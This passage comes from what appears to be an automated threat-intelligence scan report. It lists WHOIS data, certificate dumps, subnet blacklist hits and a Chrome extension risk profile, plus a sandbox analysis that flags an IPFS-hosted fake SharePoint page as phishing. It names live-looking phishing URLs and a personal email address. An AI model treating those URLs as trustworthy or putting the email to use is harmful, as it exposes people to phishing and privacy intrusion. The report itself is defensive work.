Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
| netlify.app |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
9d:49:08:08:d4:e9:44:f0:ed:d2:82:b7:e0:6b:90:98
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
Validity
Not Before: Apr 27 00:00:00 2023 GMT
Not After : May 27 23:59:59 2024 GMT
Subject: CN=*.cloudwaysapps.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d1:3a:67:3d:ac:93:fe:a1:38:17:a2:78:ab:33:
a2:2b:b2:61:9e:b0:28:f5:b1:4b:36:8d:ac:be:b1:
c0:fe:fd:0b:68:83:80:c9:b2:6b:9d:ce:40:cb:26:
30:81:2e:8f:4e:77:39:58:cb:20:c2:55:5e:20:7e:
53:22:78:e6:78:4b:04:8a:75:da:4a:51:8e:ae:c5:
7b:1a:6f:d9:5b:ee:cf:33:36:2b:2b:82:8c:3f:b8:
39:3e:ff:79:43:92:54:ec:54:d0:bf:11:c0:cd:11:
b1:92:f3:c3:cd:cc:a8:82:83:49:22:4d:4a:5e:05:
4b:3f:17:54:c9:df:81:d5:41:55:ad:33:2b:a8:09:
08:7f:43:35:1d:1c:dd:5a:53:87:bf:e3:84:b1:0d:
90:8d:c9:d7:3f:49:88:74:31:7a:b1:b0:e7:b3:d9:
25:22:dd:3d:3f:9f:60:d3:32:fe:f8:e6:52:22:4b:
db:21:12:b2:be:42:9c:9a:9f:bb:dc:74:11:17:4a:
63:9f:64:98:d9:12:4a:30:4c:41:ce:02:25:3c:32:
b3:70:72:ea:0c:c3:d1:97:6c:cf:f1:37:08:77:34:
63:17:f5:f8:ad:16:1a:eb:8c:b1:aa:63:18:20:3b:
38:58:f9:e1:92:9a:3b:73:9b:93:2b:b7:f8:4c:52:
14:d5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:8D:8C:5E:C4:54:AD:8A:E1:77:E9:9B:F9:9B:05:E1:B8:01:8D:61:E1
X509v3 Subject Key Identifier:
C9:A4:B7:DE:EA:0B:C6:29:AD:C2:08:FF:9A:8D:BB:00:2C:61:53:C2
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Certificate Policies:
Policy: 1.3.6.1.4.1.6449.1.2.2.7
CPS: https://sectigo.com/CPS
Policy: 2.23.140.1.2.1
Authority Information Access:
CA Issuers - URI:http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
OCSP - URI:http://ocsp.sectigo.com
X509v3 Subject Alternative Name:
DNS:*.cloudwaysapps.com, DNS:cloudwaysapps.com
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Apr 27 08:49:21.510 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:54:5F:22:AA:E5:91:D8:97:BC:1A:12:E0:
0D:19:AD:B4:23:74:C7:19:0B:C4:40:FB:51:89:5B:39:
3E:C4:C1:CC:02:21:00:DD:E6:D8:AC:B4:ED:A2:F3:9F:
C5:81:F6:57:5C:08:09:CE:A0:CE:8E:00:A3:67:0E:10:
B5:84:4C:5D:F0:6B:A3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : DA:B6:BF:6B:3F:B5:B6:22:9F:9B:C2:BB:5C:6B:E8:70:
91:71:6C:BB:51:84:85:34:BD:A4:3D:30:48:D7:FB:AB
Timestamp : Apr 27 08:49:21.600 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9D:80:77:45:D7:5E:B4:81:61:12:02:
29:B7:09:6D:AA:A8:EE:C0:C9:01:FE:75:B3:DD:F0:06:
DC:3E:42:DF:D0:02:21:00:F3:29:18:40:3E:1C:7B:74:
47:39:A3:57:7F:3D:0C:BE:90:CC:A8:A1:A7:11:FB:28:
6B:3A:89:A0:1D:92:A4:B6
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : EE:CD:D0:64:D5:DB:1A:CE:C5:5C:B7:9D:B4:CD:13:A2:
32:87:46:7C:BC:EC:DE:C3:51:48:59:46:71:1F:B5:9B
Timestamp : Apr 27 08:49:21.550 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:7C:D6:D7:21:C2:B8:D3:3C:1A:E2:29:5D:
A7:78:9A:B9:61:1E:8F:1D:0D:45:66:77:67:5A:0C:C3:
73:FD:9F:2E:02:20:1B:D9:E7:E8:46:D6:95:23:C8:69:
C9:B7:FD:00:71:38:3D:72:E8:26:CA:93:39:E1:22:47:
44:C3:7B:B6:58:C7
Signature Algorithm: sha256WithRSAEncryption
c2:e5:27:b1:49:8d:0c:b8:23:cc:ad:af:a2:37:17:1f:51:5f:
10:2b:2e:2c:a5:d0:39:c9:d2:53:1f:0e:b5:e4:c2:19:75:77:
48:c8:b8:2e:d8:97:35:66:1c:7f:72:90:0f:1a:b8:3a:65:bd:
9f:90:0c:35:2b:9e:fa:54:ce:78:18:0b:07:4e:0e:d6:da:2d:
b2:8b:53:d5:da:55:08:c8:37:85:a6:8b:12:14:78:6a:d5:51:
7e:f7:58:58:6a:f4:59:0c:a3:31:26:2d:fd:1a:fe:da:d0:05:
5d:26:d1:01:9e:67:1c:9c:4d:2b:07:03:e0:1f:19:40:76:89:
3d:9f:ba:6c:0c:01:c7:12:04:82:d0:3c:b5:b0:6c:8c:48:af:
91:80:42:07:ba:a0:18:f2:c7:57:76:34:05:a4:b2:7b:9f:cd:
f2:57:04:13:8a:15:7b:e3:78:fd:cc:f9:fb:3e:ee:46:57:be:
a8:be:94:c1:0c:96:ec:10:93:e0:36:2d:91:5c:a3:c9:e4:2d:
7c:ba:e9:51:8b:91:a0:77:08:a8:df:48:5b:6f:72:7a:d3:ed:
ad:97:85:76:71:19:18:df:9e:f7:1b:82:3f:24:cc:75:af:96:
74:0e:15:b3:cc:fb:a8:3c:e6:07:2b:89:aa:f9:0a:70:0d:02:
b5:99:9c:87
| 64.226.81.43 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.105): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.216 | 104.196.30.220 |
| 2023-05-12 02:53:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.io/sharepoint.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_de8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_de8_IE_EarlyTabStart_0x8b0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_de8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_de8_ConnHashTable<3560>_HashTable_Mutex"\n "IsoScope_de8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3560"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_de8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.80.64.45:443"\n "209.94.90.1:443"\n "185.199.109.153:443"\n "69.16.175.10:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.io"\n "code.jquery.com"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfee8339b462d85023.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c8fced47-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4135609b0254a2dd.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c8fced49-ece3-11ed-b5bc-0800279f3332}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfee8339b462d85023.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c8fced47-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c8fced49-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4135609b0254a2dd.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "sharepoint_2_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "fontawesome-webfont_3_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "Cab387B.tmp" has type "data"- Location: [%TEMP%\\Cab387B.tmp]- [targetUID: 00000000-00003120]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003560]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF95F11EBB1A557328.TMP" has type "data"- Location: [%TEMP%\\~DF95F11EBB1A557328.TMP]- [targetUID: 00000000-00003560]\n "~DF4135609B0254A2DD.TMP" has type "data"- Location: [%TEMP%\\~DF4135609B0254A2DD.TMP]- [targetUID: 00000000-00003560]\n "~DFC782EAE3F96BDD8E.TMP" has type "data"- Location: [%TEMP%\\~DFC782EAE3F96BDD8E.TMP]- [targetUID: 00000000-00003560]\n "~DFEE8339B462D85023.TMP" has type "data"- Location: [%TEMP%\\~DFEE8339B462D85023.TMP]- [targetUID: 00000000-00003560]\n "RecoveryStore._C8FCED47-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C8FCED49-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "_D2333118-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003120]\n "BX9T8Y4S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BX9T8Y4S.txt]- [targetUID: 00000000-00003560]\n "UK2REO93.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UK2REO93.txt]- [targetUID: 00000000-00003560]\n "7NLF2DJG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7NLF2DJG.txt]- [targetUID: 00000000-00003560]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003120]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "2N428A4N.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2N428A4N.txt]- [targetUID: 00000000-00003560]\n "sharepoint_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "CTXLPLXJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CTXLPLXJ.txt]- [targetUID: 00000000-00003560]\n "2OBJD0QQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2OBJD0QQ.txt]- [targetUID: 00000000-00003560]\n "L7SEJ68Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L7SEJ68Q.txt]- [targetUID: 00000000-00003560]\n "urlref_httpsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.iosharepoint.html" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "Cab22DC.tmp" has type "data"- Location: [%TEMP%\\Cab22DC.tmp]- [targetUID: 00000000-00003120]\n "Cab22ED.tmp" has type "data"- Location: [%TEMP%\\Cab22ED.tmp]- [targetUID: 00000000-00003120]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003120]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Window | 185.199.109.153 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | WOT Services , community of volunteer users ranking website reputation. | baffin.netcraft.com |
| 2023-05-12 02:54:44 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 122.97.148.34.bc.googleusercontent.com | 34.148.97.122 |
| 2023-05-12 02:44:06 | Internet Name | No | CertSpotter | 28 | 0 | 1 | 0 | None | nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60721cb70f8d-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:45:24 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 64.226.81.43 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.56): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8e:ad:47:f4:d5:0c:35:7b:16:d0:9b:94:a8:b1:26:20:fb:
c5:de:a5:93:db:57:19:e0:12:90:43:82:bc:d6:2f:43:eb:2e:
4c:de:6a:4e:5a:f7:3a:69:b4:d3:79:d5:3c:fc:10:95:09:06:
01:1c:46:7d:6d:7c:be:7f:a8:01:e3:93:44:8e:bd:bd:0d:b0:
bd:c9:0f:53:30:c3:5b:43:1c:de:0d:db:29:b4:9c:76:9a:cb:
51:4b:06:1b:20:dd:ec:e9:a2:bf:56:76:bf:92:0c:eb:70:70:
9b:b4:4a:4f:2d:37:e0:34:a0:a3:ff:13:86:8a:79:7e:16:1e:
8e:c6:82:ca:0f:96:f3:8a:2f:c4:0b:aa:a8:ac:55:f4:88:40:
e0:16:cf:a7:dc:c0:30:00:8e:a5:37:c8:bd:86:e7:c9:7f:a2:
43:a8:8f:4d:72:0e:2a:78:36:4d:70:de:f4:63:fb:7a:69:dd:
eb:ae:02:25:ec:2e:30:97:68:f6:5a:d7:e8:b6:58:95:b6:c1:
cc:b3:c2:25:09:9a:c8:a4:d7:3d:29:63:7c:34:a0:fc:c2:d0:
5c:94:37:dd:b4:c4:b6:03:3f:3d:50:00:5d:5e:7b:c9:e9:6b:
3d:db:2e:3d:c8:b1:34:d0:37:5f:80:1d:38:7f:1c:95:f3:da:
c4:21:7d:17
| battleb0t.xyz |
| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | carymolinaro12@gmail.com | [{"platform": "Chrome", "version": "2.1", "data": {"entrypoints": {"window.addEventListener": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jstorage.min.js": [14, 15]}, "chrome.tabs.query": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [59, 82], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/popup.js": [13], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [34, 49]}, "chrome.runtime.onMessage": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/content.js": [367], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [4], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [21]}}, "risk": {"webstore": {"website": 1, "last_updated": 2, "users": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "retire": {"total": 110, "medium": 100, "low": 10}, "permissions": {"total": 30}, "total": 524, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "metadata": {}}, "extcalls": ["https://s.click.aliexpress.com/deep_link.htm?aff_short_key=_DClxvSL&dl_target_url=", "https://www.ebay.", "http://www.dropshipping-ebay.com", "https://", "https://www.google.com/analytics/web/inpage/pub/inpage.js?", "https://ssl.google-analytics.com/j/__utm.gif", "http://www.google-analytics.com", "https://www.google.%/ads/ga-audiences?", "http://www.google.com/"], "retire": [{"results": [{"detection": "filename", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://github.com/jquery/jquery.com/issues/162"], "identifiers": {"summary": "jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates"}, "severity": "low"}], "version": "2.2.4.min", "component": "jquery"}], "file": "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jquery-2.2.4.min.js"}], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "ohfgljdgelakfkefopgklcohadegdpjf": {"rating": 4.65096, "users": 3000000, "platform": "", "short_description": "Easy-to-use PDF tools to Edit, Convert, Merge, Split and Compress PDF files.", "icon": "https://lh3.googleusercontent.com/JeGWeZiGxLb3KWGAn6FWnAjCyJDsmC7lu_O_x-h8TpDGQRa_VBnOhh-Uxh_XocOgczrfiPO_hzR_MDCleFQJeyiMwg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2865, "name": "Smallpdf - Edit, Compress and Convert PDF"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 